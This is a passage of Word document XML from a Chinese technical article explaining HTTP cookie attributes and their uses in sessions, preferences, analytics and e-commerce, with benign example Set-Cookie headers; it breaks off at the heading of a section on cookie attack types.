            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="338D9E5E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rFonts w:cs="Times New Roman"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存储的核心数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B01462D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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>user_token=xyz123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1B6E16D7" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1011" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7B169296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rFonts w:cs="Times New Roman"/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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Expires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C0276C2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rFonts w:cs="Times New Roman"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过期时间（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GMT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格式）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7592CA76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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Expires=Wed, 01 Jan 2025...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="27AF43CF" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1011" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="696F0740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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Max-Age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63761796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存活秒数（优先级高于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Expires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）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4473C091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Max-Age=2592000 (30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天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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7DDDCF2D" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1011" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="09C91A78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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03091EE7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生效域名（可跨子域）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0FF324F7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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>.sangfor.com.cn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="48A7208E" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1011" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4161F213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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="65909F23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URL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路径限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7835F28E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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>/account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="52E70BF2" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1011" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E98C1E0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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5552837E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仅通过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HTTPS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传输</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="598B5FCC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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="5E06BBE2" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1011" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="04C21FE7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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="264EA45B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禁止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JavaScript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访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3203FCD1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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>HttpOnly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3ECE7702" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1011" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4362C4C3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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>SameSite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3F2349C0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控制跨站请求携带策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47D12D95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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Lax/Strict/None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11B86551" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A1382E1" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>的核心应用场景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0990E342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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>用户会话管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B1593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登录状态保持：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25275D87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>Set-Cookie: session_id=8e7d6f5a; HttpOnly; Secure; SameSite=Lax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723BD590" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> session_id </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关联用户会话数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7CE720" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>典型时效：银行网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟，社交网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBBB387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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>个性化设置存储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E33A73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用户偏好记忆：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65464A02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>Set-Cookie: lang=zh-CN; theme=dark; Max-Age=2592000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54920EB5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语言选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主题样式</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每页显示数量等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B29BF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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>行为追踪与分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D3EC2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用户行为记录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAD5F0F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>Set-Cookie: _ga=GA1.2.123456.165000; Domain=.sangfor.com.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F24B755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 xml:space="preserve">Google Analytics </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具用于：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A45DE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问路径分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F773794" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转化率计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9C121D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>广告效果评估</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6FCB37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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>电商场景应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3A6F1" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的电商场景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84"/>
        <w:gridCol w:w="5660"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="69BE4C22" w14:textId="77777777" w:rsidTr="00501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6B83A9A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功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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4ACF1A0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Cookie</w:t>
            </w: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实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="0D5C000F" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="447B995B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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>购物车保存</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="54B70C34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rFonts w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>cart_items=[{"id":101,"qty":2}]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="39FD856E" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1D7AF8C6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rFonts w:cs="Times New Roman"/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最近浏览记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="11A675AF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rFonts w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>recent_viewed=[205,307,409]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4BD3491E" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4DF4920B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A/B</w:t>
            </w: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测试分组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A939BF8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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>ab_test_group=variant_b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03A8DD71" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0043EDDA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>的安全风险与防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490887B5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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>主要攻击类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674AF77B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
